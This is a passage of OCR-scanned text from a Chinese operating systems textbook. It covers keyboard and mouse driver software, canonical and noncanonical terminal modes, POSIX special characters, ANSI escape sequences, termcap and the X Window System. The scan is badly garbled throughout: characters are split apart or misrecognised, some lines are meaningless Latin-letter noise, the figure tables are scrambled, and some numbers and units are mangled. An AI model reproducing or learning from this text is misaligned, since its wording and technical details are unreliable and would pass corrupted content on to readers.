5)CPU 变 成 空闲 。 


为 了 了 解 这 些 事件 发 生得 有 多 频繁 ，Aron 和 Druschel 对 于 几 种 
CPU 负 载 进行 了 测量 ， 包 括 全 负载 Web 服 务 器 、 具 有 计算 约束 后 台 作 
业 的 Web 服 务 器 、 从 因特网 上 播放 实时 音频 以 及 重 编译 UNIX 内 核 。 进 
入 内 核 的 平均 进入 率 在 2hs 到 1hs 之 间 变 化 ， 其 中 大 约 一 半 是 系统 调 
用 。 因 此 ， 对 于 一 阶 近似 ， 让 一 个 软 定 时 器 每 隔 2ps 曾 响 一 次 是 可 行 
的 ， 虽然 这 样 做 偶尔 会 错过 最 终 时 限 。 对 于 发 送 数 据 包 或 者 轮 询 到 来 
的 数据 包 这 样 的 应 用 而 言 ， 有 时 可 能 晚 10hs 比 让 中 断 消 耗 35% 的 CPU 
时 间 要 好 。 


当然 ， 可 能 有 一 段 时 间 不 存在 系统 调用 、TLB 未 命中 或 页 面 故 
隐 ， 在 这 些 情况 下 ， 没 有 软 定 时 融会 闸 啊 。 为 了 在 这 些 时 间 间 隔 上 设 
置 一 个 最 大 值 ， 可 以 将 辅助 硬件 定时 器 设置 为 每 隔 一 定时 间 (例如 


Ims) 闸 啊 一 次 。 如 果 应 用 程序 对 于 偶然 的 时 间 间 隔 能 够 忍受 每 秒 
有 1000 个 数据 包 ， 那 么 软 定 时 器 和 低频 硬件 定时 器 的 组 合 可 能 比 纯粹 
的 中 断 驱 动 VO 或 者 纯粹 的 轮 询 要 好 。 


mi 
ZN 
y 


5.6 APA: Beak > EA a las 


每 台 通 用 计算 机 都 配 有 一 个 键盘 和 一 个 监视 器 “并且 通常 还 有 一 
Abin) ， 使 人 们 可 以 与 之 交互 。 尽 管 键盘 和 监视 器 在 技术 上 是 独立 
的 设备 ， 但 是 它们 紧密 地 一 同 工 作 。 在 大 型 机 上 ， 通 稼 存在 许多 远程 
用 户 ， 每 个 用 户 拥有 一 个 设备 ， 该 设备 包括 一 个 键盘 和 一 个 连 在 一 起 
的 显示 器 作为 一 个 单位 。 这 些 设备 在 历史 上 被 称 为 终端 (terminal) ° 
人 们 通常 继续 使 用 该 术语 ， 即 便 是 讨论 个 人 计算 机 时 (主要 是 因为 缺 
之 更 好 的 术语 ) 。 


5.6.1 输入 软件 


用 户 输 入 主要 来 自 键 盘 和 鼠标 ， 所 以 我 们 要 了 解 它们 。 在 个 人 计 
算 机 上 ， 键 盘 包 含 一 个 藤 入 式微 处 理 右 ， 该 微 处 理 硕 通过 一 个 特殊 的 
串 行 端口 与 主板 上 的 控制 必 片 通信 (尽管 链 副 越 来 越 多 地 连接 到 USB 
端口 上 ) 。 每 当 一 个 键 被 按 下 的 时 候 都 会 产生 一 个 中 断 ， 并 且 每 当 一 
个 键 补 释放 的 时 候 还 会 产生 第 二 个 中 断 。 在 发 生 每 个 这 样 的 键盘 中 断 
时 ， 键 副 驱 动 程序 都 要 从 与 键盘 相关 联 的 VO 闻 口 提取 信息 ， 以 了 解 发 
生 了 什么 事情 。 其 他 的 一 切 事 情 都 是 在 软件 中 发 生 的 ， 在 相当 大 的 程 
度 上 独立 于 硬件 。 


当 想象 往 shell 窗 口 (命令 行 界面 ) 键入 命令 时 ， 可 以 更 好 地 理解 
本 小 市 余下 的 大 部 分 内 容 。 这 是 程序 员 通 常 的 工作 方式 。 我 们 将 在 下 
面 讨 论 图 形 界 面 。 


1. 键 盘 软件 


IO 端口 中 的 数字 是 键 编号 ， 称 为 扫描 码 (scan code) ， 而 不 是 
ASCII 码 。 键 盘 所 拥有 的 键 不 超过 128 个 ， 所 以 只 需 7 个 位 表示 键 编号 。 
当 键 按 下 时 ， 第 8 位 设置 为 0， 当 键 释放 时 ， 第 8 位 设置 为 1°。 跟 路 每 个 
键 的 状态 ( 按 下 或 弹 起 ) 是 驱动 程序 的 任务 。 


例如 ， 当 A 键 被 按 下 时 ， 扫 描 码 (30) 被 写 入 一 个 VO 寄存 器 。 驱 
动 程序 应 该 负责 确定 键入 的 是 小 写字 母 、 大 写字 母 、CTRL-A、ALT- 
A、CTRL-ALT-A 还 是 某 些 其 他 组 合 。 由 于 驱动 程序 可 以 断定 哪些 键 已 
经 按 下 但 是 还 没有 被 释放 (例如 SHIFT) ， 所 以 它 拥 有 足够 多 的 信息 来 
做 这 一 工作 。 


例如 ， 击 键 序列 


按 下 SHIFT， 按 下 A， 释 放 A， 释 放 SHIFT 


指示 的 是 大 写字 母 A。 然 而 击 键 序列 


按 下 SHIFT， 按 下 A， 释 放 SHIFT， 释 放 A 


ta RAIA SALA co RARER AT AY TE a EE 
上 ， 但 是 却 极其 灵活 。 例 如 ， 用 户 程序 可 能 对 刚刚 键入 的 一 个 数字 是 
来 自 顶 疹 的 一 排 键 还 是 来 目 边 上 的 数字 键盘 感 兴趣 。 原 则 上 ， 张 动 程 


序 能 够 提供 这 一 信息 。 


键盘 驱动 程序 可 以 采纳 两 种 可 能 的 处 理 方法 。 在 第 一 种 处 理 方 法 
中 ， 了 驱动 程序 的 工作 只 是 接收 输入 并 且 不 加 修改 地 向 上 层 传送 。 这 
样 ， 从 键盘 读数 据 的 程序 得 到 的 是 ASCII 码 的 原始 序列 。 (向 用 户 程 序 
提供 扫描 码 过 于 原始 ， 并 且 高 度 地 依赖 于 机 器 。) 


这 种 处 理 方法 非常 适合 于 像 emacs 那 样 的 复杂 屏幕 编辑 器 的 需要 ， 
它 允 许 用 户 对 任意 字符 或 字符 序列 施加 任意 的 动作 。 然 而 ， 这 意味 着 
如 果 用 户 键入 的 是 dste 而 不 是 date， 为 了 修改 错误 而 键入 三 个 退 格 键 和 
ate， 然 后 是 一 个 回 车 键 ， 那 么 提供 给 用 户 程序 的 是 键入 的 全 部 11 个 
ASCII 码 ， 如 下 所 示 : 


dste ~ « « ate CR 


FEAF PB REP aR A BX Ze a, EA a AREY) 
输入 ， 而 不 是 如 何 产生 它 的 准确 的 序列 。 这 一 认识 导致 了 第 二 种 处 理 
方法 :键盘 驱动 程序 处 理 全 部 行内 编辑 ， 并 且 只 将 校正 后 的 行 传送 给 
用 户 程 序 。 第 一 种 处 理 方法 是 面向 字符 的 ;第 二 种 处 理 方法 是 面向 行 
的 。 最 初 它们 分 别 被 称 为 原始 模式 (raw mode) 和 加 工 模式 (cooked 


mode) ° POSIX#Av# (i ARK EDDA ANB ALE REL (canonical mode) 
来 描述 面向 行 的 模式 。 非 规范 模式 (noncanonical mode) 与 原始 模式 是 
等 价 的 ， 尽 管 终端 行为 的 许多 细节 可 能 被 修改 了 。POSIX 兼 容 的 系统 
提供 了 知 干 库 函 数 ， 文 持 选 择 这 两 种 模式 中 的 一 种 并 且 修改 许多 参 


WARE RPE (加 工 ) 模式 ， 则 字符 必须 存储 起 来 直到 积 款 
完整 的 一 行 ， 因 为 用 户 随 后 可 能 决定 删除 一 行 中 的 一 部 分 。 即使 键盘 
处 于 原始 模式 ， 程 序 也 可 能 尚未 请 求 输入 ， 所 以 字符 也 必须 缓冲 起 来 
以 便 允 许 用 户 提 前 键入 。 可 以 使 用 专用 的 缓冲 区 ， 或 者 缓冲 区 也 可 以 
从 池 中 分 配 。 前 着 对 提前 键入 提出 了 国定 的 限制 ， 后 者 则 没有 。 当 用 
尸 在 shell 窗 口 (Windows 的 命令 行 窗口 中 击 键 并 且 刚 刚 发 出 一 条 尚未 
完成 的 命令 (例如 编译 ) 时 ， 将 引起 尖锐 的 问题 。 后 继 键入 的 字符 必 
须 被 缓冲 ， 因 为 shell 还 没有 准备 好 读 它们 。 那 至 不 允许 用 户 担 前 键入 
的 系统 设计 者 应 该 被 涂 析 油 、 粘 羽毛 中 ， 或 者 更 加 严重 的 惩罚 是 ， 强 
迫 他 们 使 用 他 们 目 己 设计 的 系统 。 


虽然 键盘 与 监视 右 在 逻辑 上 是 两 个 独立 的 设备 ， 但 是 很 多 用 户 已 
经 习惯 于 看 到 他 们 刚刚 键入 的 字符 出 现在 屏幕 上 。 这 个 过 程 叫做 回 显 
(echoing) 。 


当 用 户 正在 击 键 的 时 候 程序 可 能 正在 写 屏 幕 ， 这 一 事实 使 回 显 变 
得 错综复杂 (请 再 一 次 想象 在 shell 窗 口中 击 键 ) 。 最 起 码 ， 键 盘 驱 动 


程序 必须 解决 在 什么 地 方 放置 新 键入 的 字符 而 不 被 程序 的 输出 所 履 


TE ° 


当 超 过 80 个 字符 必须 在 具有 80 字 符 行 (或 某 个 其 他 数字 ) 的 窗口 
中 显示 时 ， 也 使 回 显 变 得 错综复杂 。 根 据 应 用 程序 ， 折 行 到 下 一 行 可 
能 是 适宜 的 。 某 些 驱动 程序 只 是 通过 丢弃 超出 80 列 的 所 有 字符 而 将 每 
行 截断 到 80 个 字符 。 


男 一 个 问题 是 制 表 符 的 处 理 。 通 常 由 驱动 程序 来 计算 光标 当前 定 
位 在 什么 位 置 ， 它 既 要 考虑 程序 的 输出 又 要 考虑 回 显 的 输出 ， 并 且 要 
计算 要 回 显 的 正确 的 空格 个 数 。 


现在 我 们 讨论 设备 等 效 性 问题 逻辑 上 ， 在 一 个 文本 行 的 结尾 ， 
人 们 需要 一 个 回 车 和 一 个 换行 ， 回 车 使 光标 移 回 到 第 一 列 ， 换 行使 光 
标 前 进 到 下 一 行 。 要 求 用 户 在 每 一 行 的 结尾 键入 回 车 和 换行 是 不 受 欢 
迎 的 。 这 束 要 求 驱 动 程序 将 输入 转化 成 操作 系统 使 用 的 格式 。 在 UNIX 
中 ，ENTER 键 被 转换 成 一 个 换行 用 于 内 部 存储 ， 而 在 Windows 中 ， 它 
被 转换 成 一 个 回 车 跟随 一 个 换行 。 


如 果 标 准 形式 只 是 存储 一 个 换行 (UNIX 约 定 ) ， 那 么 回 车 (由 
Enter 键 造成 ) 应 该 转换 为 换行 。 如 果 内 部 格式 是 存储 两 者 (Windows 
约定 ) ， 那 么 驱动 程序 应 该 在 得 到 回 车 时 生成 一 个 换行 并 且 在 得 到 换 
行 时 生成 一 个 回 车 。 不 管 是 什么 内 部 约定 ， 监 视 器 可 能 要 求 换行 和 回 


车 两 者 都 回 显 ， 以 便 正确 地 更 新 屏幕 。 在 诸如 大 型 计算 机 这 样 的 多 用 
户 系统 上 ， 不 同 的 用 户 可 能 拥有 不 同类 型 的 终端 连接 到 大 型 计算 机 

上 ， 这 束 要 求 键盘 驱动 程序 将 所 有 不 同 的 回 车 /换行 组 合 转换 成 内 部 系 
统 标准 并 且 安 排 好 正确 地 实现 回 显 。 


在 规范 模式 下 操作 时 ， 许 多 输入 字符 具有 特殊 的 含义 。 图 5-35 显 示 
出 了 POSIX 要 求 的 所 有 特殊 字符 。 黑 认 的 是 所 有 控制 字符 ， 这 些 控制 
字符 应 该 不 与 程序 所 使 用 的 文本 输入 或 代码 相 冲 突 ， 但 是 除了 最 后 两 
个 以 外 所 有 字符 都 可 以 在 程序 的 控制 下 修改 。 


R 
CTRL-U 
CTRL-V 
CTRL-D 

= 

NL 


图 5-35 在 规范 模式 下 特殊 处 理 的 字符 


退 格 一 个 字符 
PX BR IE TE BEA MI REAT 
按 字 面 意义 解释 下 一 个 字符 
停止 输出 
开始 输出 
中 断 进 程 (SIGINT) 
强制 核心 转 储 (SIGQUIT ) 
文件 结尾 
回 车 《不 可 修改 的 ) 
换行 〈 不 可 修改 的 ) 


ERASE FIT 30 ¥F Fd HEBREW BEALE FE o EES eB TT 
(CTRL+H) 。 它 并 不 添加 到 字符 队列 中 ， 而 是 从 队列 中 删除 前 一 个 字 
符 。 它 应 该 被 回 显 为 三 个 字符 的 序列 ， 即 退 格 符 、 空 格 和 退 格 符 ， 以 
便 从 屏幕 上 删除 前 一 个 字符 。 如 果 前 一 个 字符 是 制 表 符 ， 那 么 删除 它 
取决 于 当 它 被 键入 的 时 候 是 如 何 处 理 的 。 如 果 制 表 符 直接 展开 成 空 
格 ， 那 么 束 需 要 某 些 额外 的 信息 来 决定 后 退 多 远 。 如 果 制 表 符 本 号 被 
存放 在 输入 队列 中 ， 那 么 束 可 以 将 其 删除 并 且 重 新 输出 整 行 。 在 大 多 
数 系统 中 ， 退 格 只 删除 当前 行 上 的 字符 ， 不 会 删除 回 车 并 且 后 退 到 前 


=e? 


当 用 户 注意 到 正在 键入 的 一 行 的 开头 有 一 个 错误 时 ， 擦 除 一 整 行 
并 且 从 头 再 来 常常 比较 方便 。KILL 字 符 控 除 一 整 行 。 大 多 数 系统 使 被 
控 除 的 行 从 屏幕 上 消失 ， 但 是 也 有 少数 古老 的 系统 回 显 该 行 并 且 加 上 
一 个 回 车 和 换行 ， 因 为 有 些 用 户 喜 欢 看 到 旧 的 一 行 。 因 此 ， 如 何 回 显 
KILL 是 个 人 喜好 问题 。 与 ERASE 一 样 ，KILL 通 党 也 不 可 能 从 当前 行进 
一 步 回 退 。 当 一 个 字符 块 被 删除 时 ， 如 果 使 用 了 缓冲 ， 那 么 烦 劳 驱动 
程序 将 缓冲 区 退还 给 缓冲 池 可 能 值得 做 也 可 能 不 值得 做 。 


有 时 ERASE 或 KILL 字 符 必须 作为 普通 的 数据 键入 。LNEXT 字 人 符 用 
作 一 个 转 义 字符 (escape character) 。 在 UNIX 中 ，CTRL+V 是 默认 的 
转 义 字符 。 例 如 ， 更 加 古老 的 UNIX 系 统 常常 使 用 @ 作 为 KILL 字 符 ， 但 
是 因特网 邮件 系统 使 用 linda@cs.washington.edu 形 式 的 地 址 。 有 的 人 觉 


得 老式 的 约定 更 加 舒服 从 而 将 KILL 重 定义 为 @， 但 是 之 后 又 需要 按 字 
面 意义 键入 一 个 @ 符 号 到 电子 邮件 地 址 中 。 这 可 以 通过 键入 CTRL+V@ 
来 实现 。CTRL+V 本 身 可 以 通过 键入 CTRL+V CTRL+V 而 按 字面 意义 键 
入 。 看 到 一 个 CTRL+V 之 后 ， 驱 动 程序 设置 一 个 标志 ， 表 示 下 一 字符 免 
除 特殊 处 理 。LNEXT 字 符 本 身 并 不 进入 字符 队列 。 


为 了 让 用 户 阻止 屏幕 图 像 滚动 出 视线 ， 提 供 了 控制 码 以 便 冻 结 屏 
幕 并 且 之 后 重新 开始 滚动 。 在 UNIX 系 统 中 ， 这 些 控制 码 分 别 是 STOP 
(CTRL+S) 和 START (CTRL+Q) 。 它 们 并 不 被 存储 ， 只 是 用 来 设置 
或 清除 键盘 数据 结构 中 的 一 个 标志 。 每 当 试图 输出 时 ， 就 检查 这 个 标 
志 。 如 果 标 志 已 设置 ， 则 不 输出 。 通 常 ， 回 显 也 随 程序 输出 一 起 被 抑 
制 。 


杀 死 一 个 正在 被 调试 的 失控 程序 经 常 是 有 必要 的 ，INTR (DEL) 
和 QUIT (CTRL+\) 字符 可 以 用 于 这 一 目的 。 在 UNIX 中 ，DEL 将 
SIGINT 信 和 号 发 送 到 从 该 键盘 局 动 的 所 有 进程 。 实 现 DEL 是 相当 需要 技 
巧 的 ， 因 为 UNIX 从 一 开始 就 被 设计 成 在 同一 时 刻 处 理 多 个 用 户 。 因 
此 ， 在 一 般 情况 下 ， 可 能 存在 多 个 进程 代表 多 个 用 户 在 运行 ， 而 DEL 
键 必须 只 能 向 用 户 自己 的 进程 发 信号 。 困 难 之 处 在 于 从 驱动 程序 获得 


信息 送 给 系统 处 理 信号 的 那 部 分 ， 后 者 毕竟 还 没有 请 求 这 个 信息 。 


CTRLT+ 与 DEL 相 类 似 ， 只 是 它 发 送 的 是 SIGQUIT 信 号 ， 如 果 这 个 
言 号 没有 被 捕捉 到 或 被 名 略 ， 则 强迫 进行 核心 转 储 。 当 敲 击 这 些 键 中 


的 任意 一 个 键 时 ， 驱 动 程序 应 该 回 显 一 个 回 车 和 换行 并 且 为 了 全 新 的 
开始 而 放弃 累积 的 全 部 输入 。INTR 的 默认 值 经 常 是 CTRL+C 而 不 是 
DEL， 因 为 许多 程序 针对 编辑 操作 可 互 换 地 使 用 DEL 与 退 格 符 。 


另 一 个 特殊 字符 是 EOF (CTRL+D) 。 在 UNIX 中 ， 它 使 任何 一 个 
针对 该 终端 的 未 完成 的 读 请 求 以 缓冲 区 中 可 用 的 任何 字符 来 满足 ， 即 
使 缓冲 区 是 空 的 。 在 一 行 的 开头 键入 CTRL+D 将 使 得 程序 读 到 0 个 字 
节 ， 按 惯例 该 字符 被 解释 为 文件 结尾 ， 并 且 使 大 多 数 程序 按照 它们 在 
处 理 输入 文件 时 遇 到 文件 结尾 的 同样 方法 对 其 进行 处 理 。 


2. 鼠 标 软 件 


大 多 数 PC 机 具有 一 个 鼠标 ， 或 者 具有 一 个 跟踪 球 ， 跟 踩 球 不 过 是 
缮 在 其 有 有 部 上 的 鼠标 。 一 种 常见 类 型 的 鼠标 在 内 部 具有 一 个 橡皮 球 ， 
该 橡 皮 球 通过 鼠标 确 部 的 一 个 圆 洞 突出 ， 当 鼠标 在 一 个 粗糙 表面 上 移 
动 时 檬 皮球 会 随 看 旋转 。 当 橡皮 球 旋转 时 ， 它 与 放置 在 相互 垩 直 的 深 
轴 上 的 两 个 橡皮 深 简 相 摩 擦 。 东 西方 向 的 运动 导致 平行 于 y 轴 的 深 轴 旋 
转 ， 南 北方 癌 的 运动 导致 平行 于 x 轴 的 滚 轴 旋转。 


男 一 种 流行 的 鼠标 类 型 是 光学 鼠标 ， 它 在 其 抵 部 装备 有 一 个 或 多 
个 发 光 二 极 管 和 闪电 探测 套 。 早 期 的 区 学 鼠标 必须 在 特殊 的 鼠标 垫上 
操作 ， 鼠 标 共 上 刻 有 和 矩形 的 网 格 ， 这 样 鼠 标 能 够 计数 穿 过 的 线 数 。 现 


代 光 学 鼠标 在 其 中 有 图 像 处 理 芯 片 并 且 获 取 处 于 它们 下 方 的 连续 的 低 
分 辨 率 照 片 ， 寻 找 从 图 像 到 图 像 的 变化 。 


当 刀 标 在 随便 哪个 方向 移动 了 一 个 确定 的 最 小 距离 ， 或 者 按钮 被 
按 下 或 释放 时 ， 都 会 有 一 条 消息 发 送 给 计算 机 。 最 小 距离 大 约 是 0.Imm 
(尽管 它 可 以 在 软件 中 设置 ) 。 有 些 人 将 这 一 单位 称 为 一 个 鼠标 步 
(mickey) 。 鼠 标 可 能 具有 一 个 、 两 个 或 者 三 个 按钮 ， 这 取决 于 设计 
者 对 于 用 户 跟踪 多 个 按钮 的 智力 的 估计 。 某 些 鼠 标 具 有 滚轮 ， 可 以 将 
额外 的 数据 发 送 回 计 算 机 。 无 线 鼠 标 与 有 线 鼠 标 相 同 ， 区 别 是 无 线 鼠 
标 使 用 低 功率 无 线 电 ， 例 如 使 用 蓝牙 (Bluetooth) 标准 将 数据 发 送 回 
计算 机 ， 而 有 线 鼠 标 是 通过 导线 将 数据 发 送 回 计 算 机 。 


ACS ET RAL BES ME: Ax、Ay、 按 钮 ， 即 目 上 一 次 
消 妃 之 后 x 位 置 的 变化 、 目 上 一 次 消 轧 之 后 y 位 置 的 变化 、 按 钮 的 状 
态 。 消 息 的 格式 取决 于 系统 和 鼠标 所 具有 的 按钮 的 数目 。 通 党 ， 消 息 
占 3 字 节 。 大 多 数 鼠 标 返 回报 告 最 多 每 秒 40 次 ， 所 以 鼠标 和 目 上 一 次 报告 
之 后 可 能 移动 了 多 个 鼠标 步 。 


al 


TER, 5 
轻 轻 地 拿 起 
消息 发 出 。 


标 仅 仅 指 出 位 置 上 的 变化 ， 而 不 是 绝对 位 置 本 吴 。 如 采 
\ 标 并 且 轻 轻 地 放下 而 不 导致 橡皮 球 旋 转 ， 那 么 束 不 会 有 


peat 


某 些 GUI 区 分 单 击 与 双击 鼠标 按钮 。 如 果 两 次 点 击 在 空间 上 (鼠标 
步 ) 足够 接近 ， 并 且 在 时 间 上 (ee) 也 足够 接近 ， 那 么 就 会 发 出 双 
击 信号 。 最 大 的 “足够 接近 ”是 软件 的 事情 ， 并 且 这 两 个 参数 通常 是 
户 可 设置 的 。 


[1] 原文 为 betarred and feathered， 有 是 英国 古代 的 一 种 酷刑 。 受 刑 人 全 刁 
涂 上 灼热 的 柏油 (tarred) ,然后 将 其 喘 上 粘 满 羽毛 (feathered) 。 这 
Me, PBS AIR MEAL T, Z th ME oe BZ AZ {Fi © be tarred and 
feathered FA F Ethan sc BN" Da RR © ——eaa yt 


5.6.2 ”输出 软件 


下 面 我 们 考虑 输出 软件 。 站 先 我 们 将 讨论 到 文本 窗口 的 简单 输 
出 ， 这 有 是 程序 员 通 常 喜欢 使 用 的 方式 。 然 后 ， 我 们 将 考虑 图 形 用 户 界 


当 输 出 古 连 续 的 单一 字体、 大 小 和 颜色 的 形式 时 ， 输 出 比 输入 倍 
单 。 大 体 上 ， 程 序 将 字符 发 送 到 当前 窗口 ， 而 字符 在 那里 显示 出 来 。 
通 前 ， 一 个 字符 块 或 者 一 行 是 在 一 个 系统 调用 中 被 写 到 窗口 上 的 。 


屏幕 编辑 器 和 许多 其 他 复杂 的 程序 需要 能 够 以 更 加 复杂 的 方式 更 
新 屏幕 ， 例 如 在 屏幕 的 中 间 替 换 一 行 。 为 满足 这 样 的 需要 ， 大 多 数 输 
出 驱动 程序 支持 一 系列 命令 来 移动 光标 ， 在 光标 处 插入 或 者 删除 字符 
或 行 。 这 些 命令 常常 被 称 为 转 义 序列 (escape sequence) 。 在 25 行 80 列 
ASCII 呈 终端 的 全 盛 期 有数 百 种 终 闻 类 型 ， 每 一 种 都 有 自己 的 转 义 序 
列 。 因 而 ， 编 写 在 一 种 以 上 的 终端 类 型 上 工作 的 软件 是 十 分 困难 的 。 


一 种 解决 方案 是 称 为 termcap 的 终 站 数 据 库 ， 它 征 在 伯克利 UNIX 中 
引入 的 。 该 软件 包 定 义 了 许多 基本 动作 ， 例 如 将 光标 移动 到 CT, 
列 ) 。 为 了 将 光标 移动 到 一 个 特殊 的 位 置 ， 软 件 〈 如 一 个 编辑 器 ) 使 
用 一 个 一 般 的 转 义 序列 ， 然 后 该 转 义 序列 被 转换 成 将 要 被 执行 写 操作 


的 终端 的 实际 转 义 序列 。 以 这 种 方式 ， 该 编辑 器 就 可 以 工作 在 任何 有 具 
有 termcap 数 据 库 入 口 的 终端 上 。 许 多 UNIX 软 件 仍然 以 这 种 方式 工作 ， 
即使 在 个 人 计算 机 上 。 


逐渐 地 ， 业 界 看 到 了 转 义 序列 标准 化 的 需要 ， 所 以 就 开发 了 一 个 
ANSI 标 准 。 图 5-36 所 示 为 一 些 该 标准 的 取 值 。 


转 义 序列 
ESC [nA 
ESC [nB 
ESC [nC 
ESC [nD 


向 上 移动 m 行 
向 下 移动 m 行 
同 右 移动 n 个 间隔 
向 左 移动 mw 个 间隔 


Ip 
yc 
ae a 


ESC [m;nH 将 光标 移动 到 (m,n) 
ESC [sJ 从 光标 清除 屏幕 〈0 到 结尾 、1 从 开始 、2 两 者 ) 


— 


在 光标 处 插入 n 行 
在 光标 处 删除 n 行 
在 光标 处 删除 n 个 字符 | 


ESC | sK 从 光标 清除 行 《0 到 结尾 、1 从 开始 、2 两 者 ) 
ESC [nL 

ESC [nM 

ESC [nP 

ESC [n@ 在 光标 处 插入 n 个 字符 

ESC [nm 允许 再 现 n (0= 常 规 、4= 粗 体 、5= 闪 烁 、7= 反 和 白 ) 
ESC M 如 果 光 标 在 顶 行 上 则 向 后 滚动 屏幕 


Al 5-36 终端 驱动 程序 在 输出 时 接受 的 ANSI 转 义 序列 。ESC 表 示 
ASCII 转 义 字 符 (0x1B) ，n、m 和 s 是 可 选 的 数值 参数 


下 面 考 虑 文本 编辑 器 怎样 使 用 这 些 转 义 序列 。 假 设 用 户 键入 了 一 
条 命令 指示 编 错 夷 完全 删除 第 3 行 ， 然 后 封 财 第 2 行 和 第 4 行 之 间 的 间 
隙 。 编 辑 器 可 以 通过 串 行 线 回 终端 发 送 如 下 的 转 义 序列 : 


ESC [3;1 H ESC [0 K ESC [1 M 


(其 中 在 上 面 使 用 的 空格 只 是 为 了 分 开 符号 ， 它 们 并 不 传送 ) 。 
这 一 序列 将 光标 移动 到 第 3 行 的 开头 ， 擦 除 整个 一 行 ， 然 后 删除 现在 的 
空 行 ， 使 从 第 4 行 开始 的 所 有 行 同 上 移动 一 行 。 现 在 ， 第 4 行 变 成 了 第 3 
行 ， 第 5 行 变 成 了 第 4 行 ， 以 此 类 推 。 类 似 的 转 义 序列 可 以 用 来 在 显示 
的 中 间 状 加 文本 。 字 和 字符 可 以 以 类 似 的 方式 添加 或 删除 。 


H 


2X BORA 


几乎 所 有 UNIX 系 统 的 用 户 界面 都 以 X 窗 口 系统 (X Window 
System) 为 基础 ，X 窗 口 系统 经 常 仅 称 为 X， 它 是 作为 Athena 计 划 趾 的 
一 部 分 于 20 世 纪 80 年 代 在 MIT 开 发 的 。X 窗 口 系统 具有 非常 好 的 可 移植 
性 ， 并 且 完 全 运行 在 用 户 空间 中 。 人 们 最 初 打算 将 其 用 于 将 大 量 的 远 
程 用 户 终端 与 中 央 计 算 服 务 器 相连 授 ， 所 以 它 在 逻辑 上 分 成 客户 软件 
和 主机 软件 ， 这 样 束 有 可 能 运行 在 不 同 的 计算 机 上 。 在 现代 个 人 计算 
机 上 ， 两 部 分 可 以 运行 在 相同 的 机 器 上 “。 在 Linux 系 统 上 ， 流 行 的 
Gnome 和 KDE 桌 面 环境 就 运行 在 X 之 上 。 


当 X 在 一 台 机 如 上 运行 时 ， 从 键 姐 或 岂 标 采集 输入 并 且 将 输出 写 到 
屏幕 上 的 软件 称 为 X 服 务 器 (X server) 。 它 必须 跟踪 当前 选择 了 哪个 
窗口 (鼠标 指针 所 在 处 ， 这 样 它 就 知道 将 新 的 键盘 输入 发 送 给 哪个 
客户 。 它 与 称 为 X 客 户 (X client) 的 运行 中 的 程序 进行 通信 (可 能 通 


过 网 络 ) o ERRER IA RRA KEP, HEA RAS 


X 服 务 器 总 是 位 于 用 户 的 计算 机 内 部 ， 而 X 客 户 有 可 能 在 远方 的 远 
程 计 算 服 务 器 上 ， 这 看 起 来 也 许 有 些 不 可 思议 ， 但 是 X 服 务 紫 的 主要 工 
作 有 是 在 屏幕 上 显示 位 ， 所 以 让 它 靠 近 用 户 是 有 道理 的 。 从 程序 的 观点 
来 看 ， 它 十 一 个 客户 ， 吟 只 服 务 占 做 事情 ， 例 如 显示 文本 和 几何 图 
形 。 服 务 器 (在 本 地 PC 中 ) Hehe POE SE, BRAT AAR 
务 占 所 做 的 那样 。 


对 于 X 客 望 和 X 服 务 硕 在 不 同 机 器 上 的 情形 ， 客 尸 与 服务 紫 的 布置 
如 岁 5-37 所 示 。 但 是 当 在 单一 的 机 瑚 上 运行 Gnome 或 者 KDE 时 ， 客 户 只 
苹 使 用 X 库 与 相同 机 器 上 的 X 服 务 器 进行 会 话 的 某 些 应 用 程序 〈 但 是 通 
过 套 接 字 使 用 TCP 连 接 ， 与 远程 情形 中 所 做 的 工作 相同 ) 。 
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图 5-37 MIT XX 窗口 系统 中 的 客户 与 服务 
在 单机 上 或 者 通过 网 
其 


网 络 在 UNIX (或 其 他 操作 系统 ) 之 上 运 和 


口 系统 都 是 可 行 的 ， 其 原因 在 于 X 实 际 上 定义 的 是 X 客 户 与 X 服 务 
间 的 X 协 议 ， 如 图 5-37 所 示 。 客 户 与 服 
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PiE — RILE, weit 
过 一 个 局 域 网 隔 开 了 100m， 或 者 是 相距 几 千 公里 并 且 通 


过 Internet 相 连 
接 都 无 关 紧 要 。 在 所 有 这 些 情 况 下 ， 协 议 与 系统 操作 都 是 
的 。 


H => 


完全 相同 
XX 只 是 一 个 窗口 系统 ， 它 不 是 一 个 完全 
GUI， 要 在 其 上 运 


的 GUI。 为 了 获得 完全 的 
其 他 软件 层 。 一 层 是 Xlib， 它 是 一 组 库 过 程 ， 用 于 
访问 XX 的 功能 。 这 些 六 


进行 分 析 ， 但 是 


过 程 形成 了 X 窗 口 系统 的 基础 ， 我 们 将 在 下 面 对 其 
这 些 过 程 过 于 原始 了 


， 以 至 于 大 多 数 用 户 程序 不 


接 访问 它们 。 例 如 ， 每 次 鼠标 点 击 是 单独 报告 的 ， 所 以 确定 两 次 点 击 
实际 上 形成 了 双击 必须 在 Xlib 之 上 处 理 。 


为 了 使 得 对 X 的 编程 更 加 容易 ， 作 为 X 的 一 部 分 提供 了 一 个 工具 
包 ， 组 成 了 Intrinsics 〈 本 征 函 数 集 ) 。 这 一 层 管理 按钮 、 滚 动 条 以 及 其 
他 称 为 窗口 小 部 件 (widget) 的 GUI 元 素 。 为 了 产生 真正 的 GUI 界面 ， 
具有 一 致 的 外 观 与 感觉 ， 还 需要 另外 一 层 软件 〈 或 者 几 层 软件 ) 。 一 
个 例子 是 Motif， 如 图 5-37 所 示 ， 它 是 Solaris 和 其 他 商业 UNIX 系 统 上 使 
用 的 公共 桌面 环境 (Common Desktop Environment) 的 基础 。 大 多 数 应 
用 程序 利用 的 是 对 Motif 的 调用 ， 而 不 是 对 Xlib 的 调用 。Gnome 和 KDE 
具有 与 图 5-37 相 类 似 的 结构 ， 只 是 库 有 所 不 同 。Gnome 使 用 GTK+ 库 ， 
KDE 使 用 Qt 库 。 拥 有 两 个 GUI 是 否 比 一 个 好 是 有 争议 的 。 


此 外 ， 值 得 注意 的 是 窗口 管理 并 不 是 X 本 身 的 组 成 部 分 。 将 其 遗漏 
的 决策 完全 是 故意 的 。 一 个 单独 的 客户 进程 ， 称 为 窗口 管理 器 
(window manager) ， 控 制 着 屏幕 上 窗口 的 创建 、 删 除 以 及 移动 。 为 
了 管理 窗口 ， 窗 口 管理 器 要 发 送 命令 到 X 服 务 器 告诉 它 做 什么 。 窗口 管 
理 如 经 第 运行 在 与 X 客 户 相 同 的 机 右上 ， 但 是 理论 上 它 可 以 运行 在 任何 
地 方 。 


这 一 模块 化 设计 ， 包 括 若干 层 和 多 个 程序 ， 使 得 X 高 度 可 移植 和 高 
